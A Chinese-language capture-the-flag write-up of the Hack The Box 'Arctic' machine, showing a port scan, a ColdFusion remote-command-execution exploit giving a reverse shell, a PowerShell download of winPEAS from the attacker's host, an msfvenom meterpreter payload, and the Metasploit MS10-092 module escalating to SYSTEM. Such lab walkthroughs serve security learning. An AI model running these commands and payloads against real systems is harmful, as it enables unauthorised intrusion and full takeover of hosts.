免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务发现
┌──(rootkali)-[~/htb/Arctic]└─# nmap -Pn -sV 10.10.10.11 -p-Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-14 10:26 ESTNmap scan report for 10.10.10.11Host is up (0.26s latency).Not shown: 65532 filtered portsPORT STATE SERVICE VERSION135/tcp open msrpc Microsoft Windows RPC8500/tcp open fmtp?49154/tcp open msrpc Microsoft Windows RPCService Info: OS: Windows; CPE: cpe:/o:microsoft:windows连个web服务都没有,一下子有点懵。。
8500端口不太常见,尝试在浏览器上关上,十分慢,然而存在一个文件遍历破绽
Index of /CFIDE/ dir 03/22/17 08:52 cfdocs/ dir 03/22/17 08:55 上面门路是一个cms的登录页面
http://10.10.10.11:8500/CFIDE/administrator/看title上的cms名字:ColdFusion
在谷歌找了几个这个cms的exp,找到了这个Remote Command Execution
下载到本地,批改本地ip和端口
执行攻打:
rinting some information for debugging...lhost: 10.10.14.6lport: 4444rhost: 10.10.10.11rport: 8500payload: 7ed641ce03ea4eaa92aca6d9ef4c60ab.jspDeleting the payload...Listening for connection...Executing the payload...listening on [any] 4444 ...connect to [10.10.14.6] from (UNKNOWN) [10.10.10.11] 49510Microsoft Windows [Version 6.1.7600]Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\ColdFusion8\runtime\bin>whoamiwhoamiarctic\tolisC:\ColdFusion8\runtime\bin>拿到了初始shell。。
提权
传winpea到靶机
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.6:8000/winPEAS.bat','c:\Users\tolis\Desktop\winPEAS.bat')"依据winpea枚举显示,靶机短少较多补丁,可能能够利用来提权
"Microsoft Windows Server 2008 R2 Standard " [i] Possible exploits (https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat) MS11-080 patch is NOT installed XP/SP3,2K3/SP3-afd.sys) MS16-032 patch is NOT installed 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon) MS11-011 patch is NOT installed XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa) MS10-59 patch is NOT installed 2K8,Vista,7/SP0-Chimichurri) MS10-21 patch is NOT installed 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel) MS10-092 patch is NOT installed 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched) MS10-073 patch is NOT installed XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout) MS17-017 patch is NOT installed 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading) MS10-015 patch is NOT installed 2K,XP,2K3,2K8,Vista,7-User Mode to Ring) MS08-025 patch is NOT installed 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys) MS06-049 patch is NOT installed 2K/SP4-ZwQuerySysInfo) MS06-030 patch is NOT installed 2K,XP/SP2-Mrxsmb.sys) MS05-055 patch is NOT installed 2K/SP4-APC Data-Free) MS05-018 patch is NOT installed 2K/SP3/4,XP/SP1/2-CSRSS) MS04-019 patch is NOT installed 2K/SP2/3/4-Utility Manager) MS04-011 patch is NOT installed 2K/SP2/3/4,XP/SP0/1-LSASS service BoF) MS04-020 patch is NOT installed 2K/SP4-POSIX) MS14-040 patch is NOT installed 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer) MS16-016 patch is NOT installed 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address) MS15-051 patch is NOT installed 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys) MS14-070 patch is NOT installed 2K3/SP2-TCP/IP) MS13-005 patch is NOT installed Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast) MS13-053 patch is NOT installed 7SP0/SP1_x86-schlamperei) MS13-081 patch is NOT installed 7SP0/SP1_x86-track_popup_menu) 编译一个meterpreter的shell传到靶机,不便咱们利用补丁提权:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=4455 -f exe > shell64.exe
拿到反弹的session当前,抉择MS10-092补丁的利用模块
msf6 > search MS10-092Matching Modules================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/local/ms10_092_schelevator 2010-09-13 excellent Yes Windows Escalate Task Scheduler XML Privilege EscalationInteract with a module by name or index. For example info 0, use 0 or use exploit/windows/local/ms10_092_schelevator设置好参数
msf6 exploit(windows/local/ms10_092_schelevator) > optionsModule options (exploit/windows/local/ms10_092_schelevator): Name Current Setting Required Description ---- --------------- -------- ----------- CMD no Command to execute instead of a payload SESSION 2 yes The session to run this module on. TASKNAME no A name for the created task (default random)Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST tun0 yes The listen address (an interface may be specified) LPORT 4466 yes The listen portExploit target: Id Name -- ---- 0 Windows Vista, 7, and 2008动员攻打
msf6 exploit(windows/local/ms10_092_schelevator) > run[*] Started reverse TCP handler on 10.10.14.6:4466 [*] Preparing payload at C:\Users\tolis\AppData\Local\Temp\bHVjZOnFoCage.exe[*] Creating task: wHs9mNJi8EUp2[*] SUCCESS: The scheduled task "wHs9mNJi8EUp2" has successfully been created.[*] SCHELEVATOR[*] Reading the task file contents from C:\Windows\system32\tasks\wHs9mNJi8EUp2...[*] Original CRC32: 0xc87307c[*] Final CRC32: 0xc87307c[*] Writing our modified content back...[*] Validating task: wHs9mNJi8EUp2[*] [*] Folder: \[*] TaskName Next Run Time Status [*] ======================================== ====================== ===============[*] wHs9mNJi8EUp2 1/1/2022 6:04:00 �� Ready [*] SCHELEVATOR[*] Disabling the task...[*] SUCCESS: The parameters of scheduled task "wHs9mNJi8EUp2" have been changed.[*] SCHELEVATOR[*] Enabling the task...[*] SUCCESS: The parameters of scheduled task "wHs9mNJi8EUp2" have been changed.[*] SCHELEVATOR[*] Executing the task...[*] Sending stage (200262 bytes) to 10.10.10.11[*] SUCCESS: Attempted to run the scheduled task "wHs9mNJi8EUp2".[*] SCHELEVATOR[*] Deleting the task...[*] Meterpreter session 3 opened (10.10.14.6:4466 -> 10.10.10.11:49789) at 2021-12-15 03:06:45 -0500[*] SUCCESS: The scheduled task "wHs9mNJi8EUp2" was successfully deleted.[*] SCHELEVATORmeterpreter > getuidServer username: NT AUTHORITY\SYSTEM胜利提权到AUTHORITY\SYSTEM